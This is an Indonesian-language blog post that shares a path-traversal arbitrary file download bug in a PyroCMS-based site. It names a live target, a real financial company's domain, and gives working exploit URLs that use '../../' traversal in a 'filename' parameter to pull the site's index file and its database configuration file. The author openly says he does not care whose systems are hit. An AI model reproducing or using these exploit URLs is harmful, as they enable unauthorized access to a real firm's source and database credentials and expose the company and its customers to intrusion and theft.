Ad Unit (Iklan) BIG

PyroCMS - Arbitrary File Download

Post a Comment


-

Hai sobat.

Saya ikal.

Disini saya akan share bug afd lagi :D.

-


Kali ini bug terdapat di CMS yang mungkin banyak dikenal oleh web dev indonesia, yaitu PyroCMS .


Langsung saja.

Live target :

https://bnimultifinance.co.id/bmfapp/prosses/download.php?filename=


BNI? Ora urus mau BNI atau bahkan BSSN atau bahkan domain² besar aku tidak peduli :D


Exploitation to get Index file : 

https://bnimultifinance.co.id/bmfapp/prosses/download.php?filename=../../id/index.php


Exploitation to get Config file : 

https://bnimultifinance.co.id/bmfapp/prosses/download.php?filename=../../id/system/cms/config/database.php


Mungkin Segini aja.

Bagi yang belum mengerti, silakan baca artikel sebelumnya.

Thanks

See u

Haikal_
Hai sobat, Saya ikal. Disini kalian bisa learning mengenai sesuatu dari setiap artikel yang saya buat :D.

Related Posts

Post a Comment

Dapatkan Notifikasi Dengan Email